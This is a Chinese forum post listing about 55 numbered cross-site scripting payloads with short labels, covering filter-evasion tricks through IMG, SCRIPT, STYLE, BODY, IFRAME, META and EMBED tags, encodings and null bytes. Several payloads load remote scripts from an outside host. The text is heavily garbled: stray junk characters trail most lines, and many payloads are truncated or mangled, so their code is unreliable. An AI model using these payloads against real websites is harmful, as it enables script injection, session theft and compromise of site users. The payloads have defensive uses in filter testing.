(1)普通的XSS JavaScript注入( s- k0 v! B9 u- W* J" H* p
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 |' q I4 }" P% m, O(99)另类弹框* O7 ^! } r( ~* Z* R$ L
<q/oncut=alert()>1# o" u- m0 @: H# l
<s/onclick=alert()>b
( [+ A+ A- x" D, b8 b) U <XSS=" onclick="alert(1)//">clickme</SSX=">
" g$ d5 Q4 t. t( U <zzz onclick=alert`1`>clickme</zzz> ! V: Y, t6 t. y. F1 x' S; Z
<a onclick=alert`1`>clickme</a>
3 D1 G& }/ J9 ^: f; T<a=">clickme</a=">* u3 U- V5 _/ {% d- {) a0 h
<a=">clickme</a>
7 }. Z! I! o4 u$ `<z=">clickme</z=">' P, d) T. l1 {" g( H( h
<z onclick=alert`1`>clickme</z>
' Y- N5 {# K, Z; a2 M' U1 j9 u( e; X: S% l( h3 I
(2)IMG标签XSS使用JavaScript命令$ \0 j& V. d" x. x' h
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 V, J3 u5 o- v: t$ V! i1 \. l& m% g, ?
. w, t4 G8 Y0 ] l+ [$ v(3)IMG标签无分号无引号
6 J) s5 v- d, I! T9 e6 D. `<IMG SRC=javascript:alert(‘XSS’)>0 ]. `+ D$ M4 f# w
6 q( X* p1 y5 v9 b* v" G(4)IMG标签大小写不敏感
0 P$ t n' Q. I<IMG SRC=JaVaScRiPt:alert(‘XSS’)>5 i3 z0 f7 p. Z. t* }( h
" e2 L1 Z( |2 x& h( n(5)HTML编码(必须有分号)
% D. Z$ m: w: E+ y+ ~( R7 {<IMG SRC=javascript:alert(“XSS”)>. ]# p, Q* M- i$ ?2 [
6 H7 g" n; e9 _8 e7 j' A- j(6)修正缺陷IMG标签
$ ^! B) t$ b5 f7 F8 W<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
' z) h! l: C' x+ V: L' ~! w9 F! ^) `
) C2 R, c3 v$ I8 a# e(7)formCharCode标签(计算器)
0 o: X( V B/ m; j% d% E/ U<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
! _1 k; ~$ r2 ?$ `3 z0 k4 {7 {+ d/ M: L* R& q$ @- ~
(8)UTF-8的Unicode编码(计算器)
; D% T3 s7 U. Z<IMG SRC=jav..省略..S')>/ p: i8 `* B8 D9 x- C4 h& I
/ L2 y) a3 i9 j7 J4 \(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
; d0 v+ O9 ]/ R: z" X Y<IMG SRC=jav..省略..S')># O6 j5 ]2 G# T& E) F+ |. v
4 @7 h) ?: Y9 U, e% i) e& }(10)十六进制编码也是没有分号(计算器)2 k" K. z" ~- `: I& T. B
<IMG SRC=\'#\'" /span>
& L+ M. d2 U) ^' @2 v
4 A% _- W) W, I0 l" t(11)嵌入式标签,将Javascript分开$ J m. z8 d% A
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> H, j a4 R- P5 m6 ^
( `! `# ~( @9 D( E(12)嵌入式编码标签,将Javascript分开
# R7 {% D- ]! ^$ `<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
2 e8 {4 ]+ U5 `6 p6 r3 j- E7 y2 S
. X9 v/ K$ s9 o# O' H(13)嵌入式换行符
1 M- S. m. s- z<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
; i6 C+ ~; e& y2 G4 Z: E) A7 u( o0 @9 T$ X4 K
(14)嵌入式回车
6 f' Q# e: R1 j9 Y6 q<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
6 ^# ?7 m2 u2 t4 d2 D' L; a8 V. Q( Y/ ~4 O1 z
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
3 J. W w/ U0 d3 M, ?<IMG SRC=\'#\'" /span>8 _6 d$ w* |7 S9 Y( S9 u
' b: F) L. C% R8 c$ x2 D, ~
(16)解决限制字符(要求同页面): Y: G" L: U2 Z$ L# J
<script>z=’document.’</script>
Y: [* @* g/ T7 v<script>z=z+’write(“‘</script>
* J; \* b+ h9 [& T; c" O<script>z=z+’<script’</script>
4 r: q8 Z+ w3 U# ?- Z" |( _<script>z=z+’ src=ht’</script>
9 _, m& O) [5 M ?7 A! A<script>z=z+’tp://ww’</script>2 U" e+ Y9 z, X! M. r# A( a" A
<script>z=z+’w.shell’</script>
) O" Q8 }' [; s% e0 a) s7 I2 I5 G<script>z=z+’.net/1.’</script>
; e/ I ^" X" w: Y% y) K9 ~<script>z=z+’js></sc’</script>
! ~% q- V; b6 m9 p9 l<script>z=z+’ript>”)’</script>
' A9 P/ {/ Q( U' c<script>eval_r(z)</script>9 _* h4 E, F) T5 l4 p6 R
, Z+ v4 s* } M( Y; x8 u" _
(17)空字符 V8 M" f p1 R) D" ]; Y
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out6 f& j, X, M! K! w! V5 L: R% b
, d; b$ C" c3 }5 e% z$ i+ F$ u
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用3 q0 G, M* {& d; Q7 z r- @9 H3 S
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out6 w2 Y6 p% E4 k r0 W7 P$ H7 P. Q
$ {) [( b& D+ A/ t6 S
(19)Spaces和meta前的IMG标签
5 t3 l4 n# z& f/ k- }; c<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
y5 x2 a+ } T$ \$ d
; i1 O2 o* v& }/ n6 O9 w/ ~(20)Non-alpha-non-digit XSS+ v' r1 e3 T7 G4 R: P
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
x' |2 J) [: t; |+ _% q
" N. I7 N5 Z# L9 ?: y* M0 I: i: s(21)Non-alpha-non-digit XSS to 2
]0 a, }# T* T; j. |' i" {1 M<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
, P/ h2 z5 {3 d* ^. _) v
0 I# A5 Y, _& S$ b(22)Non-alpha-non-digit XSS to 3" a5 S: D+ R0 l: b
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
, j$ s0 y# F u X9 Y7 a0 N0 L& c6 s2 T0 S' s# ~- }( q! i
(23)双开括号 B+ r2 r8 O) r
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
$ H- @+ `3 v5 d7 F1 X( U; a
7 N# Y) b, R& N! F(24)无结束脚本标记(仅火狐等浏览器)3 B9 }- h2 Q, G0 }" D& W
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
& ~# ~3 M- e$ ~/ H1 p( @) T1 ^( h9 {% q
(25)无结束脚本标记2& L& J8 A* P9 C6 Y D6 [
<SCRIPT SRC=//3w.org/XSS/xss.js>' ^3 w2 B+ W4 g* k! ?7 K J6 m
% d" ]5 V4 @7 z$ u' |
(26)半开的HTML/JavaScript XSS% p1 ^) p/ C6 G# e8 Q
<IMG SRC=\'#\'" /span>1 F' L: J9 E1 U# ]* c; ^3 N4 l& q
4 E- L# I. n3 N: x$ Q' M8 N R
(27)双开角括号
% ^' O; l2 u4 b. f+ G& [1 `) p<iframe src=http://3w.org/XSS.html <1 F3 O- K6 H" K+ D- t
4 |% ^8 D( q& b5 {- E
(28)无单引号 双引号 分号
- e4 x# {1 w1 ^' c! M# u<SCRIPT>a=/XSS/, a }6 u; m% w$ ?
alert(a.source)</SCRIPT>& E4 O# m: `2 z
5 I1 w2 k" p4 \! X0 k(29)换码过滤的JavaScript2 e' b& u+ m. m/ [5 X3 j: ]" H
\”;alert(‘XSS’);//
' _ o1 Q: x5 K Y( Z
# h( C6 D# [* K3 q(30)结束Title标签
" z8 m) z8 g) p" I) R</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
7 t$ z9 \! o3 S! ?/ R
7 M8 K! J5 G, I6 u4 |. E) Q(31)Input Image
J( F9 ~4 k' ~7 G. K<INPUT SRC=\'#\'" /span>
. ?9 S0 @ ]+ R+ q7 N f6 a' {( F/ b$ a1 T% W' Y4 K
(32)BODY Image
4 M0 p9 _; z5 c<BODY BACKGROUND=”javascript:alert(‘XSS’)”>' T7 {+ `3 U* u# o7 ]3 Q
6 g0 d+ s. @5 ]' W
(33)BODY标签
) {9 v7 ~! Y( \9 _* A8 q+ z- w<BODY(‘XSS’)>
: O1 s& R& g( r( e6 A _6 {4 x$ j( D$ l1 x+ a( V+ `) d# e
(34)IMG Dynsrc7 l k& g8 T& I& V: B# T- \2 @
<IMG DYNSRC=\'#\'" /span>
4 T1 o0 l3 z( t5 N" H( w. \; d$ z/ t7 T+ Q5 L1 C( X G
(35)IMG Lowsrc
1 y% H X/ y3 Z' x6 ~* A<IMG LOWSRC=\'#\'" /span>
. Y, l, H1 v% a2 S+ O1 v
1 w: _! P% T! u4 Q6 H(36)BGSOUND4 H, T) }2 p# F
<BGSOUND SRC=\'#\'" /span>
; P) s; M8 v l6 {9 ]7 ?; p) v1 g8 h r
(37)STYLE sheet9 }, a4 h1 b1 d" D/ M
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
5 i- ?" n+ f' Y1 f1 v/ C4 l! Y8 n8 u" d2 ?; N5 L1 d
(38)远程样式表
+ w+ p( F6 X7 L# Y3 b<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>0 b) K( f, n# }) _) q3 C
+ x2 w# S' a2 C* _: g6 u2 ]! W( X(39)List-style-image(列表式)
# X8 P+ g9 ?5 O! ?* H# }<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
/ ~. U/ ~0 y* r1 \- b
2 ?* d: {/ h; Q+ Z0 }(40)IMG VBscript! ~0 X: C* @9 g$ o% e
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS. w0 }8 m! _, [8 J) [( g
6 R6 A( Z3 y: E# `; R
(41)META链接url
4 H/ B: X o8 I& u! U2 j# j<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>: o, |- Q# l6 z1 _ g6 V: X; t
: N3 y2 O, E* E% v, T" v
(42)Iframe' ?: G0 q# L0 z1 ]% N
<IFRAME SRC=\'#\'" /IFRAME>8 K( j, e# U( l0 L: |
6 Z' r' V* A( f4 y' j& s(43)Frame5 W3 s) m" ~9 ^
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>4 Q8 B: c) e4 @1 Y
) Q; r- x" D& n(44)Table
+ l/ s9 b/ ^+ v' h, Q<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>& z+ `1 I& i0 } |3 X# R
: E# G9 [7 _2 t. Q T' _5 a(45)TD
# G8 z0 v8 n6 N% F$ E<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>. v4 g& I7 V" n% v
: J! ]( T }6 {6 c( ~7 s# S(46)DIV background-image
' M; A0 q1 M( B7 {<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>9 v6 x& C# f; l# i9 G. ?1 }
! k, d/ Q" P9 y4 ~ G2 Z
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)5 U- T+ o* l. v6 g
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>3 A1 E$ D T5 r' t( m3 }( A% L9 l1 X8 r
6 d2 @2 H w% T" W5 G& r4 q
(48)DIV expression1 [ C: z: g$ h p
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
# x& x* i8 { z8 s7 q
: `# ~) N6 r( q( u2 ]4 X+ K(49)STYLE属性分拆表达
! B8 f: q* E8 q4 l$ T<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
. \ }9 k. A- R9 `1 D7 ^0 V x4 G- @7 J6 X
(50)匿名STYLE(组成:开角号和一个字母开头)% q3 v$ g0 E. ]0 u+ F
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
5 H; R! Z; A J
0 z) r8 \& B$ x+ a7 i(51)STYLE background-image
( L# U9 o( H- l) [<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
2 D- d9 K: }! [0 x
' P- Q" E) X; [- r6 b9 q(52)IMG STYLE方式
0 K0 ]; r7 f z$ t0 g# S0 ?% hexppression(alert(“XSS”))’>) I# t' y; I. i; Y k1 q
: O9 b" G$ k5 P, P
(53)STYLE background3 H J8 ]4 R0 a
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>5 n! h! j/ n. p- l F! N
r% w( m* I4 D4 P) `) i( n$ X(54)BASE
q6 a' s8 g, c4 m! O5 Q<BASE HREF=”javascript:alert(‘XSS’);//”>) {8 D4 N) T' K+ { u: L9 x
9 H. ^& U" I& _2 o
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
) s1 e/ A- k6 n0 l& |. t8 h<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>' R q4 W, P1 D: D* l1 n ^! n5 [
|
发表于 2016-4-28 10:06:15
收藏
支持
反对